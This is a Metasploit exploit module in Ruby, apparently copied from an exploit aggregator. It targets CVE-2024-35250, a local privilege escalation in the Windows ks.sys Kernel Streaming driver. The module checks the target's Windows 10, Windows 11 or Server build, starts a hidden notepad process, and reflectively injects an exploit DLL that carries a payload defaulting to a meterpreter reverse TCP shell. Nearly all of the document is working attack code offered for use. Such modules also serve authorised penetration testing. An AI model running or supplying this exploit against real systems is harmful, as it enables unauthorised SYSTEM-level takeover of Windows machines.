## https://sploitus.com/exploit?id=MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2024_35250_KS_DRIVER-
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Exploit::Local::WindowsKernel
include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process
include Msf::Post::Windows::ReflectiveDLLInjection
include Msf::Post::Windows::Version
prepend Msf::Exploit::Remote::AutoCheck
class VulnerableDriverNotPresent < StandardError; end
class TargetNot64BitWindows < StandardError; end
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Windows Access Mode Mismatch LPE in ks.sys',
'Description' => %q{
The ks.sys driver on Windows is one of the core components of Kernel Streaming and is installed by default.
There exists a LPE in this driver which can be exploited on many recent versions of Windows 10,
Windows 11, Windows Server 2022.
},
'Author' => [
'AngelBoy', # discovery
'varwara', # PoC
'jheysel-r7' # module
],
'References' => [
[ 'URL', 'https://github.com/varwara/CVE-2024-35250'],
[ 'URL', 'https://devco.re/blog/2024/08/23/streaming-vulnerabilities-from-windows-kernel-proxying-to-kernel-part1-en/'],
[ 'URL', 'https://googleprojectzero.blogspot.com/2019/03/windows-kernel-logic-bug-class-access.html'],
[ 'CVE', '2024-35250']
],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Privileged' => true,
'Arch' => [ ARCH_X64 ],
'SessionTypes' => [ 'meterpreter' ],
'Targets' => [
['Windows x64', { 'Arch' => ARCH_X64 }]
],
'DefaultOptions' => {
'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
},
'DefaultTarget' => 0,
'DisclosureDate' => '2024-06-11',
'Notes' => {
'Stability' => [ CRASH_SAFE, ],
'SideEffects' => [ ARTIFACTS_ON_DISK, ],
'Reliability' => [ REPEATABLE_SESSION, ]
}
)
)
end
def target_compatible?(version)
raise TargetNot64BitWindows, 'Non 64-bit Windows systems are not affected' unless session.platform == 'windows' && sysinfo['Architecture'] == ARCH_X64
file_path = get_env('WINDIR') + '\\system32\\drivers\\ks.sys'
raise VulnerableDriverNotPresent, 'The target system does not have ks.sys in system32\\drivers\\' unless file?(file_path)
vprint_status("Windows Build Number = #{version.build_number}")
return true if version.build_number.between?(Msf::WindowsVersion::Win10_1607, Msf::WindowsVersion::Win10_22H2)
return true if version.build_number == Msf::WindowsVersion::Win11_21H2 || version.build_number == Msf::WindowsVersion::Win11_22H2
return true if version.build_number.between?(Msf::WindowsVersion::Server2016, Msf::WindowsVersion::Server2022)
false
end
def check
version = get_version_info
begin
return Exploit::CheckCode::Appears("ks.sys is present, Windows Version detected: #{version}") if target_compatible?(version)
rescue VulnerableDriverNotPresent, TargetNot64BitWindows => e
return Exploit::CheckCode::Safe("#{e.class}: #{e.message}")
end
CheckCode::Safe("Version detected: #{version}")
end
def exploit
fail_with(Failure::None, 'Session is already elevated') if is_system?
if datastore['ForceExploit'] || !datastore['AutoCheck']
begin
version = get_version_info
fail_with(Failure::NoTarget, "The exploit does not support this version of Windows: #{version}") unless target_compatible?(version)
print_good("ks.sys is present, Windows Version detected: #{version}")
rescue VulnerableDriverNotPresent, TargetNot64BitWindows => e
fail_with(Failure::NoTarget, "#{e.class}: #{e.message}")
end
end
print_status('Launching notepad to host the exploit...')
notepad_path = get_notepad_pathname(ARCH_X64, client.sys.config.getenv('windir'), ARCH_X64)
print_status("The notepad path is: #{notepad_path}")
notepad_process = client.sys.process.execute(notepad_path, nil, { 'Hidden' => true })
print_status("The notepad pid is: #{notepad_process.pid}")
encoded_payload = payload.encoded
execute_dll(
::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2024-35250', 'CVE-2024-35250.x64.dll'),
[encoded_payload.length].pack('I<') + encoded_payload,
notepad_process.pid
)
end
end